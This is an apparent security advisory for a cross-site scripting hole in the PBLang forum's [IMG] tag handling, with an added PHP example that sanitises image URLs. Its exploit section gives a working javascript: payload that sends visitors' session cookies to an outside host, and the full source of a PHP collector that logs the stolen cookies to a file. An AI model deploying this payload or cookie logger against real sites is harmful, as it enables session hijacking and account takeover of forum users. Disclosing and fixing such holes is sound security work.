
PBLang Cross Site Scripting Vulnerability (Newest version)




PBLang is a PHP-based forum. A security hole has just been found in this product that allows an attacker to steal cookies or do many other things…



|--------------------------------------------|



Vulnerable systems: PBLang Forum

Version:   4.56 (4.5 RC 2)

Website: http://pblang.drmartinus.de/

Problem: Cross Site Scripting (XSS)



|--------------------------------------------|



When you insert [IMG]url[/IMG], PBLang changes that text to <img src="url">. If someone inserts javascript:'anyscript'() instead of the url, the JavaScript code is executed by Internet Explorer or some other web browsers.
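
An added example (not part of the original advisory and not PBLang's own code): one way to render [IMG] tags so that only http/https URLs reach the src attribute and everything else in the post is HTML-escaped. The function names and sample posts are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not PBLang's own code.
const ALLOWED_SCHEMES = ['http', 'https'];

function is_safe_image_url(string $url): bool
{
    // Browsers ignore tabs/newlines inside a URL scheme ("java\tscript:"),
    // so reject whitespace and control characters outright.
    if ($url === '' || preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false; // relative, scheme-less or malformed
    }
    return in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true);
}

function render_img_tags(string $post): string
{
    // Escape the whole post first, so the only live HTML is what we emit.
    $escaped = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');
    return preg_replace_callback(
        '#\[IMG\](.*?)\[/IMG\]#is',
        function (array $m): string {
            // Undo the escaping to validate the URL the user actually typed.
            $url = htmlspecialchars_decode($m[1], ENT_QUOTES);
            if (!is_safe_image_url($url)) {
                return '[image removed]';
            }
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $escaped
    );
}

// Constructed sample posts.
$samples = [
    '[IMG]http://example.org/cat.png[/IMG]',
    '[IMG]javascript:alert(1)[/IMG]',
    "[IMG]java\tscript:alert(1)[/IMG]",
    '[IMG]http://example.org/x.png" onerror="alert(1)[/IMG]',
];
foreach ($samples as $s) {
    echo render_img_tags($s), PHP_EOL;
}
```

Only the first sample produces an <img> element; the other three are replaced with the placeholder text.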



EXPLOIT:



Inserting a new topic (or reply) with the following text will send visitors' cookies to your host. The output is saved to http://your-host/cookies.txt .





[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape

(document.cookie), "subwindows", "height=100,width=486")[/IMG]

 



* Code of docs.php file:

*----------docs.php---------
<?php
define ("LINE", "\r\n");
define ("HTML_LINE", "<br>");

function getvars($arr, $title)
{
    $res = "";
    $len = count($arr);
    if ($len>0)
    {
        if (strlen($title)>0)
        {
            print("[--------$title--------]" . HTML_LINE);
            $res .= "[--------$title--------]" . LINE;
        }
        foreach ($arr as $key => $value)
        {
            print("[$key]" . HTML_LINE);
            print($arr[$key] . HTML_LINE);
            $res .= "[$key]" . LINE . $arr[$key] . LINE;
        }
    }
    return $res;
}

// get current date
$now = date("Y-m-d H:i:s");

// init
$myData = "[-----$now-----]" . LINE;

// get
$myData .= getvars($HTTP_GET_VARS, "");

// file
$file = $REMOTE_ADDR . "cookies.txt";
$mode = "r+";
if (!file_exists($file))
    $mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
----------docs.php---------*



